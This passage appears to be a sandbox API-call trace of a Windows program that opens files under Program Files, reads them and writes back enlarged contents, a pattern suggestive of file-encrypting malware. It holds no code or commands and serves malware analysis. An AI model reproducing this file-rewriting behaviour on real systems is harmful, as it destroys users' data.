(lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe" (normalized: "c:\\program files\\msbuild\\executed_florists.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.816] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files\\MSBuild\\executed_florists.exe", lpFilePart=0x2d5f690*="executed_florists.exe") returned 0x2e [0065.816] GetLastError () returned 0x20 [0065.816] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i˕폈H˕퐔H˕L˕꧰Ƿ\x01") returned 0x51 [0065.816] LocalFree (hMem=0x696d00) returned 0x0 [0065.817] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.817] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0065.817] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0065.817] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0065.817] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe" (normalized: "c:\\program files\\msbuild\\executed_florists.exe")) returned 0x20 [0065.817] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwmon.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", lpFilePart=0x2d5f690*="jnwmon.dll.mui") returned 0x35 [0065.818] GetLastError () returned 0x5 [0065.818] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꧰Ƿ\x01") returned 0x13 [0065.818] LocalFree (hMem=0x69e2b0) returned 0x0 [0065.818] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0065.818] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0065.818] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0065.818] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0065.818] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwmon.dll.mui")) returned 0x20 [0066.463] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" (normalized: "c:\\program files\\windows journal\\templates\\dotted_line.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.463] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp", lpFilePart=0x2d5f690*="Dotted_Line.jtp") returned 0x3a [0066.463] GetLastError () returned 0x5 [0066.463] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0066.463] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.463] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.463] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0066.464] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.464] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.464] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp" (normalized: "c:\\program files\\windows journal\\templates\\dotted_line.jtp")) returned 0x20 [0066.464] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" (normalized: "c:\\program files\\windows journal\\templates\\shorthand.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.465] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", lpFilePart=0x2d5f690*="Shorthand.jtp") returned 0x38 [0066.465] GetLastError () returned 0x5 [0066.465] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0066.465] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.465] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.465] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0066.465] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.465] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" (normalized: "c:\\program files\\windows journal\\templates\\shorthand.jtp")) returned 0x20 [0066.466] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files\\windows mail\\winmail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.466] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files\\Windows Mail\\WinMail.exe", lpFilePart=0x2d5f690*="WinMail.exe") returned 0x29 [0066.466] GetLastError () returned 0x5 [0066.466] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x13 [0066.466] LocalFree (hMem=0x69e2b0) returned 0x0 [0066.466] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.466] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0066.466] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.466] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files\\windows mail\\winmail.exe")) returned 0x26 [0066.467] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe" (normalized: "c:\\program files (x86)\\adobe\\accupos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.467] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe", nBufferLength=0x104, lpBuffer=0x2d5f694, lpFilePart=0x2d5f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\accupos.exe", lpFilePart=0x2d5f690*="accupos.exe") returned 0x28 [0066.467] GetLastError () returned 0x20 [0066.467] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2d5f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="洀i˕폈H˕퐔H˕L˕꩐Ƿ\x01") returned 0x51 [0066.467] LocalFree (hMem=0x696d00) returned 0x0 [0066.467] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2d5d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0066.467] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2d5f894) [0066.467] RtlUnwind (TargetFrame=0x2d5f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.468] RtlUnwind (TargetFrame=0x2d5f920, TargetIp=0x407184, ExceptionRecord=0x2d5f378, ReturnValue=0x0) [0066.468] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\accupos.exe" (normalized: "c:\\program files (x86)\\adobe\\accupos.exe")) returned 0x20 [0066.468] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.468] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.468] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x4273 [0066.468] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.468] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.468] ReleaseMutex (hMutex=0x168) returned 1 [0066.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LeiaMe.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0066.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LeiaMe.htm", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeiaMe.htm", lpUsedDefaultChar=0x0) returned 10 [0066.468] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3273 [0066.471] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.471] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x3273 [0066.471] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.472] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0066.472] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.472] CloseHandle (hObject=0x1cc) returned 1 [0066.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroTextExtractor.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrotextextractor.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xbfa8 [0066.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.486] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.486] ReleaseMutex (hMutex=0x168) returned 1 [0066.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroTextExtractor.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0066.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AcroTextExtractor.exe", cchWideChar=21, lpMultiByteStr=0x1f88ba4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AcroTextExtractor.exe", lpUsedDefaultChar=0x0) returned 21 [0066.486] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea74b8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea74b8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0066.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xafa8 [0066.490] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.491] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xafa8 [0066.491] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.492] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0066.492] WriteFile (in: hFile=0x1cc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0066.492] CloseHandle (hObject=0x1cc) returned 1 [0066.600] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.740] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.740] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e00 [0066.749] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.749] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.756] ReleaseMutex (hMutex=0x168) returned 1 [0066.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DAN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.DAN", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.DAN", lpUsedDefaultChar=0x0) returned 11 [0066.756] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.776] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0066.776] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.777] CloseHandle (hObject=0x1fc) returned 1 [0066.780] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.781] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.781] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1800 [0066.781] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.781] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.781] ReleaseMutex (hMutex=0x168) returned 1 [0066.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.JPN", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.JPN", lpUsedDefaultChar=0x0) returned 11 [0066.782] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867b58, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesRead=0x2d5f2bc*=0x1800, lpOverlapped=0x0) returned 1 [0066.784] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0066.784] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0066.785] CloseHandle (hObject=0x1fc) returned 1 [0066.792] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.793] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.793] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e00 [0066.793] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.793] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.793] ReleaseMutex (hMutex=0x168) returned 1 [0066.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.SKY", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.SKY", lpUsedDefaultChar=0x0) returned 11 [0066.793] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.795] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0066.795] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.796] CloseHandle (hObject=0x1fc) returned 1 [0066.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0066.801] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.801] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e00 [0066.801] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0066.801] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.801] ReleaseMutex (hMutex=0x168) returned 1 [0066.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHT", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CHT", lpUsedDefaultChar=0x0) returned 11 [0066.801] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.803] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0066.803] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, 